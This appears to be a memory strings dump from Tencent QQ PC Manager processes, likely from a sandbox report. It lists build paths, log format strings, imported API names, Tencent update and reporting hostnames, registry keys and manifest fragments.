Detect Last Crash Time: %u, Disable Xendl Engine
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMDL\CrashMonitor.cpp
KeyValue
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMDL\DownloadEngine\QMDownloadCenterMgr.cpp
OnDownloadFileSize: TaskID: 0x%x FileSize is %d
OnDownloadPercent failed, TaskInfo not found, Engine=%d,TaskID=%d
OnDownloadComplete: Local network is closed, not try next engine, Task[%u] failed
Engine[%u] download task[%u] failed, error: %u
New Engine[%u] Create task[%u] success, Restore SpeedLimit[%u]!
New Engine[%u] Create task[%u] failed!
OnDownloadComplete: AppTaskId: %u Complete ErrorCode is %d
Engine[%u] CreateTask: AppTaskId: %u, EngineTaskId: %u, TotalTask: %u
DeleteTask: AppTaskId: %u, EngineTaskId: %u, Engine: %u
Set Task[%u] Download Speed: %u
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMDL\DownloadEngine\engine_xf\AsynXFDownload.cpp
CAsynXFDownload: InitCallbackWindow failed: %u
CAsynXFDownload: Create thread failed: %u
HandleCreateTask error, stFileInfo.strUrl or stFileInfo.strFileName is empty.
DeleteTask, taskid=0x%x
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMDL\DownloadEngine\engine_xf\QMXFDownload.cpp
XFDownload TryReloadEngine failed, bucause reload count = %u
TryReloadEngine return %u, Reload count = %u
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMDL\DownloadEngine\engine_xf\XFDownload.cpp
CreateTask error, task url is exist[%s].
CreateTask result: hr=0x%x
CreateHttpDownload
DestroyHttpDownload
%u Tasks: %uKB/s
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMDL\QMDldClient.cpp
ClientProcess: PID %d Is Bad Quit
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMDL\QMDldClientMgr.cpp
OnTimerCheckIdleExit: LastActiveTime %d
Message Window is 0x08%x
OnRequest: ProcessId: %u, MsgId:%u
OnResponse: PID %d BADREQUEST
masterconn11.qq.com
Task [%u] Speed limit: %uKB
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMDL\QMDldClientTask.cpp
DeleteTask[%p]: id=%u, error=%u,
CreateTask[%p]: id=%u, Speed=%uKB
QQLogin
(%d.%d) d:d:d.d %s_%s:d(K): %s
(%d) d:d:d.d %s_%s: %s
(M) d:d:d.d ||
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMReportMgr\QMReportMgr.cpp
InitCommonData, ProductID=%d, ClientVersion=%I64d
CreateIReportClient
ReleaseIReportClient
QMEnumLoginQQ
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMCommonlib\QMCommon.cpp
Get function "%s" address failed.
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\Output\BinFinal\QMDL.pdb
WS2_32.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegCreateKeyExW
RegCloseKey
RegOpenKeyW
RegDeleteKeyW
RegFlushKey
RegEnumKeyExW
RegNotifyChangeKeyValue
RegGetKeySecurity
RegSetKeySecurity
RegQueryInfoKeyW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
MSVCP80.dll
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
VERSION.dll
IMM32.dll
PSAPI.DLL
QMDL.exe
.?AVCQMIpcPipe@IPC@@
.?AVCQMDLHttpDownload@@
.?AVCHttpDownloadSink@@
.?AV?$CKeyValue@G@svrlib@@
.?AV?$CSingleton@VCReportManager@QMReportMgr@@@utils@@
.?AVCReportManager@QMReportMgr@@
<assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
7$7*757<7
=(=-=:=?>
5&5*626`6
9'9/969<9
B\RefuseInject.dll
bugreport.exe
bugreport /buginfo:%p:%p:%p:%lu
\StringFileInfo\xx\FileDescription
\StringFileInfo\xx\FileVersion
\StringFileInfo\xx\ProductName
QMIpc.dll
DownloadProxy.Downloader.1
Global\{416FCF35-5ADB-4312-B26B-2A82D35479F7}
\QMDns.dll
ConfigProxyPort
ConfigProxyPassword
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
AutoConfigURL
Engine[%u] create task failed!, url=%s
CreateTask: %s
uDeleteTaskInfo, m_uiAppTaskId=%d, m_uiEngineTaskId=%d, strUrl=%s
@{1254F62A-1124-40cc-AF56-D7556C170214}
{F294CCDA-8F1C-493c-ADE2-29ABFBBD25C2}
ExistsSoftMgrMutex(): mutex %s exists
CAsynXFDownload::HandleInit(): customer id = %d
gCreateTask, url=%s, filename=%s, return taskid=0x%x
@CB_FILENAME: %s
{%X-%X-%X-%X-%X%X}
CLSID\%s\LocalServer32
Tencentdl.exe
CreateProcess failed: %s, err: %d
dlcore.dll
@{2830B861-B3F1-4222-ABB8-0D733953197D}
Global\{17ED6DA0-0902-461c-B763-F00FF209066B}
Global\{FA6FBBB1-8C8E-43b1-B8EC-35573A94C231}
ErrLogFile.log
C:\ErrLogFile.log
QQQuickLoginInfo
QQLoginInfo
ntdll.dll
Failed to call RtlGetVersion(), err=%d, RtlGetVersion=%p
Windows version: %d.%d.%d (sp %d)
okernel32.dll
dr.dll
%u.%u.%u.%u
11.5.17490.219
QMCommon.dll
Load QMCommon.dll failed, path=%S
QQPCMgr.exe
QQPCTray.exe
QQPCRTP.exe
11,5,17490,219

QQPCTray.exe_3088_rwx_08EFF000_00001000:




Windows Update

tencentdl.exe_4132:




.text
`.rdata
@.data
.rsrc
@.reloc
PSSSSSSh
8%uvP
FTp1M
SSSShp
t%SSj
>.uTV
j SSSSSSSh
aSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
[%s]: %s,
asio.ssl
asio.misc
D:\src\QQMiniDL_proj\trunk\thirdparty\boost_1_44_0_build\include\boost-1_44\boost/exception/detail/exception_ptr.hpp
asio.misc error
asio.ssl error
fs-report.qq.com
fs-h2u.qq.com
fs-conn.qq.com
fs-hello.qq.com
xuanfengnet.qq.com
stun.qq.com
fs-tcp-conn.qq.com
pdlxf.qq.com
thread.exit_event
thread.entry_event
TencentDL exe Delay Exit seconds:%d
hXXp://
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
%s\Connection
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
VVV.tencent.com.
HTTP/1.1
$MD5Version: 1.0.0 November-19-1997 $
$Id: md5.c,v 1.1.1.1 2004/05/17 13:23:36 rcrittenden0569 Exp $
xf_update.request_t
xf_update.response_t
.\NewUpdate\NewUpdateMgr.cpp
TencentVer = %s, DlcoreVer = %s
Windows
Save File To %s
Response.url_info.cookies = %s
Response.url_info.ref = %s
Response.url_info.url = %s
Response.filesize = %I64d
Response.version = %s
Response.name = %s
Response.enable = %d
UniAttribute not found key:
mini-update.xf.qq.com
xf_update_svr.get_update_strategy
Request.guid = %s
Request.lanuage = %s
Request.custom_id = %d
Request.os = %s , sp = %s, os_bit = %s is_admin = %d
Request.uin = %I64d
Request.version = %s
Request.source = %s
/tencentdlinstallinfo/dtrp?v=1&&format=json&&product=tencentdlinstallinfo&&cmd=1
dtrp.tencentdlinstallinfo.qq.com
.\ReportInstall\ReportInstall.cpp
ReportInstall::CReportInstall::ReportInstallInfo
Install Info = %s
</%s>
<!--%s-->
standalone="%s"
encoding="%s"
version="%s"
&#xX;
%s='%s'
%s="%s"
PKEY_CUSTOMNAME
PKEY_PRODUCTNAME
PKEY_ISSHOW
PKEY_EXITTIME
PKEY_CUSTOMID
PKEY_START_STATUS
PKEY_GUID
PKEY_MINORVERSION
PKEY_MAJORVERSION
PKEY_COREVERSION
PKEY_EXEVERSION
PKEY_DUMPTIME
PKEY_DUMPUPLOADENABLE
PKEY_UPDATESERVERPORT
PKEY_UPDATESERVERIP
xf-com-update-doctor.qq.com
PKEY_TTL
PKEY_ISFIX
PKEY_VERSION
PKEY_FILEEMULE_HASH
PKEY_FILEEMULE_SIZE
PKEY_FILEEMULE_NAME
PKEY_FILEBT_HASH
PKEY_FILEBT_SIZE
PKEY_FILEBT_NAME
PKEY_FILECORE_HASH
PKEY_FILECORE_SIZE
PKEY_FILECORE_NAME
PKEY_URL
PKEY_PERIOD
PKEY_RESULT
kernel32.dll
.mixcrt
KERNEL32.DLL
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
GetProcessWindowStation
USER32.DLL
operator
portuguese-brazilian
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
112.90.140.6
112.90.140.7
IsNetworkOK %d
rand mod %d != 0
lc.tencent.com
addrinfo %s
appname=%s&ver=%lu&pid=%lu&random=%d
sendto %d
recvfrom %d
recvfrom fail len wrong %d
recv %x %x
127.0.0.1
0.0.0.0
d:\src\tencentdl\Tencentdl_v130\Output\Release\Tencentdl.pdb
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpQueryInfoW
HttpEndRequestW
HttpSendRequestExW
HttpAddRequestHeadersW
HttpOpenRequestW
WININET.dll
GetProcessHeap
CreateIoCompletionPort
GetCPInfo
GetConsoleOutputCP
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyW
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
WS2_32.dll
IMM32.dll
VERSION.dll
NetWkstaTransportEnum
NETAPI32.dll
WTHelperGetProvCertFromChain
CryptCATCatalogInfoFromContext
WINTRUST.dll
CertGetNameStringW
CRYPT32.dll
PSAPI.DLL
iphlpapi.dll
zcÁ
'DownloadProxy.EXE'
DownloadProxy.Downloader.1 = s 'Downloader Class'
CLSID = s '{70DE12EA-79F4-46bc-9812-86DB50A2FD64}'
DownloadProxy.Downloader = s 'Downloader Class'
CurVer = s 'DownloadProxy.Downloader.1'
ForceRemove {70DE12EA-79F4-46bc-9812-86DB50A2FD64} = s 'Downloader Class'
ProgID = s 'DownloadProxy.Downloader.1'
VersionIndependentProgID = s 'DownloadProxy.Downloader'
'TypeLib' = s '{DA624F8F-98BF-4B03-AD11-A12D07119E81}'
stdole2.tlbWWW
cuiMsgTypeWWW
pMsgParamWWWd
6|pTaskUrl
Created by MIDL version 6.00.0366 at Mon Aug 04 10:31:43 2014
&UU*&&&&&&&&*UU(%%%%%%%%(UU)%%%%%%%%)UU.$$$$$$$$.UU1''''''''1UU
"7,,11,,7"
2222222222222222
11///20.
##!!! !!!##
.02///11
mM............................................................Mm
mM..........................................Mm
(((((((JgT..TgJ(((((((
$D>".PH'8xU
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="2.0.0.0" processorArchitecture="X86" name="Tencent.TecentDL" type="win32"></assemblyIdentity><description></description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
8#9.999>9
4#525?5_5
6 70757;7
:&; ;=;];
2%2u2
8(9/969=9
1&2 222<2
9Ÿ9P9
6|7T7u7
88x8
3#3@3^3|3
;.<4<8<<<@<
8$8(8,808
3$3,393@3
6 7-7A7h7}7
1/7>7/?>?
8 8$8(8,8
1 1$1(1,1
4 4$4(4,4044484
? ?$?(?,?
1 1(101<1`1
>,>8>@>`>
Lkernel32.dll
Extract.dll
L[%s]: %s,
version.ini
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
.\Downloader\DownloadDispatcher.cpp
ATNProxy.dll
= %s,
qqdownload_config.xml
dlcore.dll
A.\Downloader\DownloaderMgr.cpp
CDownloaderMgr::SetHangMiniDumpReport
bNeedReport=%d, wait hang time =%d seconds
, uiCustomID=%u, bShowWnd=%d, strProdName=%s, sub_custom_name=%s
\tencentdl.exe
RaiseException, code:%x
CDownloaderMgr::HandleUnregister, uiCallbackPtr=%u, pid=%u, customid=%u
CDownloaderMgr::HandleUnregister, uiCallbackPtr=%u
CDownloaderMgr::Unregister, bIsDownloader=%d
CDownloaderMgr::HandleRegister, oInitParam.uiProcessID=%u, oInitParam.uiCustomID=%u
CDownloaderMgr::Register, bIsDownloader:%d
OnCheckExitTimer return, m_bStarted=%d
, m_bSetWndShow=%d, m_bUpdateMgrReg=%d
OnCheckExitTimer but m_DownloaderPtrMap Not empty, so return, m_bCanExit=%d
OnCheckClientAliveTimer return, m_bStarted:%d
dTencentDL exe Delay Exit, Set timer seconds=%d, m_bCanExit=%d, m_uiFutureExitTime=%u ms, m_uiDelayExitTime=%u ms
, m_bCanExit=%d, m_uiFutureExitTime=%u ms, m_uiDelayExitTime=%u ms
m_DownloaderPtrMap is empty, m_uiFutureExitTime=%u, m_uiDelayExitTime=%u
, pid=%u, customid=%u
HandleStart end, m_uiExeVersion:%u,m_uiCoreVersion:%u
CDownloaderMgr::Start, m_uiExeVersion=%d
DownloadProxy.Downloader.1
{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}
CLSID\%s\LocalServer32
Tencentdl.exe
C.tlb
Mscoree.dll
\bugreport.exe
bugreport_xf.exe
\Tencentdl.exe
\Installlog.txt
MiniDownload.dll
tinyxml.dll
DownloadProxyPS.dll
extract.dll
tnproxy.dll
regsvr32.exe
\bugreport_xf.exe
\DownloadProxyPS.dll
.\DownloadProxy.cpp
TencentDL tMain, filename:%s, cmd:%s
Kernel32.dll
D\StringFileInfo\xx\
netsh.exe
\\.\PhysicalDrive%d
\\.\Scsi%d:
oiphlpapi.dll
s.\NewUpdate\NewUpdateMgr.cpp
dns error! return 0. update server mini-update.xf.qq.com
uiRet = %d
nM-%.2d-%.2d %.2d:%.2d:%.2d
Unknown ProcessID. PID = %d
No pid option found in CmdLine
Content-Length: %d
\downloadproxyps.dll
\extract.dll
\tnproxy.dll
\dlcore.dll
oInstallInfo.xml
\Global.db
CUpdateMgr uiCustomID:%u,uiExitTime:%u ms, uiShowUI:%d strProdName:%s,strCustomName:%s
.\Update\UpdateMgr.cpp
uiErr:%u
NCUpdateMgr uiEnableDump:%u,uiDumpWaitTime:%u, strIP:%s,port:%d
PCUpdateMgr::OnComLoginServer
OnComLoginServer uiErr:%u
CUpdateMgr m_uiExeVersion:%u,m_uiCoreVersion:%u, m_oLoginServerAddr:%s,port:%d
LUserDataInfo.ini
L.tlg
g%s%s%s
H.\TXLog\Log.cpp
%*.*f
: %s/s
%s: %s
\TDConfig.ini
H\set.log
bugreport /buginfo:%p:%p:%p:%lu /extinfo:%p
ntdll.dll
SOFTWARE\Tencent\bugReport\
\\.\PhysicalDrive0
c:\program files\common files\tencent\qqdownload\130\tencentdl.exe
(1-10240)
1, 0, 130, 4

QQPCNetFlow.exe_4328:




.text
`.rdata
@.data
.rsrc
@.reloc
PSSh@#J
T$(RSSh
SShlZJ
8%u=P
SSSh:G
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMExe\QMNetMonExe\QMNetMonMainUI.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMExe\QMNetMonExe\Logical2UI\ConfigNetMon.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMExe\QMNetMonExe\Logical2UI\Tool3GFluxUI.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMExe\QMNetMonExe\Logical2UI\ToolNetConnUI.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMExe\QMNetMonExe\Logical2UI\ToolNetFluxUI.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMExe\QMNetMonExe\Logical2UI\ToolSpeedTestUI.cpp
Init start value %d
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMPerfMon\QMPerfMon.cpp
InsertPerfMonItem: [error] start value %d
InitPerfMon [ok]: module:%s
InitPerfMon [error]: module:%s
PerfMonStart:bSucc:%d Id:%d Session:%d module:%s
PerfMonEnd:bSucc:%d Id:%d Session:%d module:%s
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"; filename="%s"
--%s--
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Module\NetFluxControlConfig.cpp
Log.cfg
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Module\NetFluxControl.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Base\FileQuery\CFileQueryMgrImp.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Base\AsyncTask\CMyWindowBase.h
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Module\speedprotcontrol.cpp
masterconn11.qq.com
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Module\MobileFluxControl.cpp
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Config\NetflowConfig.cpp
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\ftbjsafeapp\qmlib\qmnetflowlogic\config\NetflowNormalConfig.h
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Config\NetflowNormalConfig.cpp
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\ftbjsafeapp\qmlib\qmnetflowlogic\base\netconn\ProviderImp.h
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Module\TestNetSpeed.cpp
[%d] InternetWriteFile Failed : index = %d
[NETTEST] Error on InternetWriteFile 0x%x
[%d] Error on InternetWriteFile sSendHeadData Size=%d , 0x%x
[%d] Error on HttpEndRequest Error 0x%x
[%d] HttpEndRequest Ok 0x%x
uptest.dat
X:X:X:X:X:X
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Base\AsyncTask\CAsyncThread.cpp
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\ftbjsafeapp\qmlib\qmnetflowlogic\base\filequery\TAVEngineWrap.h
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Base\FileQuery\TAVUiLogic3.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Module\SpeedLimitAlgorithm.cpp
AllocateAndGetTcpExTableFromStack
AllocateAndGetUdpExTableFromStack
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Base\NetConn\NetWorkConnection.cpp
GetExtendedTcpTable
GetExtendedUdpTable
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Base\AsyncTask\CMyMessageLoop.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Base\AsyncTask\CMyMessageLoopProxyImpl.cpp
QQLogin
(%d.%d) d:d:d.d %s_%s:d(K): %s
(%d) d:d:d.d %s_%s: %s
(M) d:d:d.d ||
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMReportMgr\QMReportMgr.cpp
InitCommonData, ProductID=%d, ClientVersion=%I64d
CreateIReportClient
ReleaseIReportClient
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMCommonlib\QMCommon.cpp
Get function "%s" address failed.
QMOpenURL
QMSearchKeyWord
QMEnumLoginQQ
QMGetIconFromCmdLine
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\Output\BinFinal\Plugins\QMNetMon\QQPCNetFlow.pdb
HttpOpenRequestW
HttpQueryInfoW
HttpSendRequestExW
HttpEndRequestW
HttpSendRequestW
HttpAddRequestHeadersW
WININET.dll
WS2_32.dll
?DelIdleCallback@Window@Util@@YAJPAVVTXMsgLoopIdleCallback@@@Z
?AddIdleCallback@Window@Util@@YAJPAVVTXMsgLoopIdleCallback@@@Z
?InitBugReport@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@Z@Z
?SetBugReportUin@TXBugReport@@YAXKPB_W@Z
?ValidateBugReport@TXBugReport@@YAXXZ
?OnConnected@CTXHttpDownloadSink@@UAEXPAVCTXHttpDownload@@@Z
?OnConnecting@CTXHttpDownloadSink@@UAEXPAVCTXHttpDownload@@PB_W@Z
??0CTXHttpDownload@@QAE@XZ
??1CTXHttpDownload@@UAE@XZ
??0CTXHttpDownloadSink@@IAE@XZ
??1CTXHttpDownloadSink@@UAE@XZ
?SetUIInterface@CTXHttpDownload@@QAEXPAVCTXHttpDownloadSink@@@Z
?SetEventMask@CTXHttpDownload@@QAEXE@Z
?Download@CTXHttpDownload@@QAEHPB_WPAU_SYSTEMTIME@@0H@Z
?CancelDownload@CTXHttpDownload@@QAEXXZ
?GetDownloadedFilePath@CTXHttpDownload@@QAEHAAVCTXStringW@@@Z
?OnRedirected@CTXHttpDownloadSink@@UAEXPAVCTXHttpDownload@@PB_W@Z
?OnDownloadStart@CTXHttpDownloadSink@@UAEXPAVCTXHttpDownload@@KK@Z
Common.dll
GF.dll
xGraphic32.dll
GetProcessHeap
CreateIoCompletionPort
WaitNamedPipeW
SetNamedPipeHandleState
CreateNamedPipeW
ConnectNamedPipe
KERNEL32.dll
EnumThreadWindows
MsgWaitForMultipleObjectsEx
USER32.dll
comdlg32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegFlushKey
RegNotifyChangeKeyValue
RegGetKeySecurity
RegSetKeySecurity
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
ATL80.DLL
SHLWAPI.dll
MSVCP80.dll
COMCTL32.dll
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
GdiplusShutdown
gdiplus.dll
SensApi.dll
VERSION.dll
RASAPI32.dll
RPCRT4.dll
IPHLPAPI.DLL
PSAPI.DLL
QQPCNetFlow.exe
.?AVVTXMsgLoopIdleCallback@@
.?AVCGFExeApp@@
.?AV?$CComObjectNoLock@V?$CGFElementDestroyListener@V?$CGFMessageListenerHelper@VCGFExeMain@@@@@@@ATL@@
.?AV?$CComObjectNoLock@V?$CGFMessageListener@V?$CGFMessageListenerHelper@VCGFExeMain@@@@@@@ATL@@
.?AV?$CComObjectNoLock@V?$CGFElementDestroyListener@V?$CGFEventListenerHelper@VCGFExeMain@@@@@@@ATL@@
.?AV?$CComObjectNoLock@V?$CGFEventListener@V?$CGFEventListenerHelper@VCGFExeMain@@@@@@@ATL@@
.?AV?$CGFElementDestroyListener@V?$CGFMessageListenerHelper@VCGFExeMain@@@@@@
.?AV?$CComPtrBase@V?$CGFElementDestroyListener@V?$CGFMessageListenerHelper@VCGFExeMain@@@@@@@ATL@@
.?AV?$CComPtr@V?$CGFElementDestroyListener@V?$CGFMessageListenerHelper@VCGFExeMain@@@@@@@ATL@@
.?AV?$CComSinkPtr@V?$CGFElementDestroyListener@V?$CGFMessageListenerHelper@VCGFExeMain@@@@@@@@
.?AV?$CGFElementDestroyListenerPtr@V?$CGFMessageListenerHelper@VCGFExeMain@@@@@@
.?AV?$CGFMessageListener@V?$CGFMessageListenerHelper@VCGFExeMain@@@@@@
.?AV?$CComPtrBase@V?$CGFMessageListener@V?$CGFMessageListenerHelper@VCGFExeMain@@@@@@@ATL@@
.?AV?$CComPtr@V?$CGFMessageListener@V?$CGFMessageListenerHelper@VCGFExeMain@@@@@@@ATL@@
.?AV?$CComSinkPtr@V?$CGFMessageListener@V?$CGFMessageListenerHelper@VCGFExeMain@@@@@@@@
.?AV?$CGFMessageListenerPtr@V?$CGFMessageListenerHelper@VCGFExeMain@@@@@@
.?AV?$CGFElementDestroyListener@V?$CGFEventListenerHelper@VCGFExeMain@@@@@@
.?AV?$CComPtrBase@V?$CGFElementDestroyListener@V?$CGFEventListenerHelper@VCGFExeMain@@@@@@@ATL@@
.?AV?$CComPtr@V?$CGFElementDestroyListener@V?$CGFEventListenerHelper@VCGFExeMain@@@@@@@ATL@@
.?AV?$CComSinkPtr@V?$CGFElementDestroyListener@V?$CGFEventListenerHelper@VCGFExeMain@@@@@@@@
.?AV?$CGFElementDestroyListenerPtr@V?$CGFEventListenerHelper@VCGFExeMain@@@@@@
.?AV?$CGFEventListener@V?$CGFEventListenerHelper@VCGFExeMain@@@@@@
.?AV?$CComPtrBase@V?$CGFEventListener@V?$CGFEventListenerHelper@VCGFExeMain@@@@@@@ATL@@
.?AV?$CComPtr@V?$CGFEventListener@V?$CGFEventListenerHelper@VCGFExeMain@@@@@@@ATL@@
.?AV?$CComSinkPtr@V?$CGFEventListener@V?$CGFEventListenerHelper@VCGFExeMain@@@@@@@@
.?AV?$CGFEventListenerPtr@V?$CGFEventListenerHelper@VCGFExeMain@@@@@@
.?AV?$CGFEventListenerHelper@VCGFExeMain@@@@
.?AVCGFExeMain@@
.?AV?$CSingleton@VCNetmonDataReport@@@QMUtils@@
.?AVCNetmonDataReport@@
.?AVCTXHttpDownloadSink@@
.?AVCQMIpcPipe@IPC@@
.PA_W
.?AVPipeServer@IPC@@
.?AVCIpcPipeServer@IPC@@
.?AVWorkerThread@PipeServer@IPC@@
.?AV?$CSingleton@VCReportManager@QMReportMgr@@@utils@@
.?AVCReportManager@QMReportMgr@@
.?AVTSMsg@@
.?AVITSMsg@@
.?AVTSMsgMap@@
.?AVITSMsgMap@@
.?AVTSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVTSMsgStub@@
.?AVITSMsgStub@@
MNetMon\QQPCNetFlow.exe
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="QQPCNetFlow" type="win32"></assemblyIdentity><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.VC80.ATL" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency></assembly>PAD
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
2(2-292[2
343S3|3
;,;0;4;8;
=$=*=?=`=
0 0$0(0,00040
2/2
3-6}6
$0<0[0/1
3)393@3_3
7\7"8 828
:-;4;,<3<
4 4$4(4,4044484<4
7 7$7(7,7
6 6$6(6,6064686<6
; ;$;(;,;0;4;8;
7,787\7|7
e\QMSkinMgr.dll
{E11173AE-6007-4a43-811E-6069470B72E6}
{04CE0CB6-CDF3-4a4b-8B9D-292A455FAF5B}
%s %s
platformxtml:QMNetMon.xml|MainWnd
{C67C2B77-7073-4b80-88D2-76D328196AA9}
QQPCMgrGF\QQPCNetFlow.tpc
\QMDns.dll
platformxtml:QMNetMon.xml|NetSpeedTest
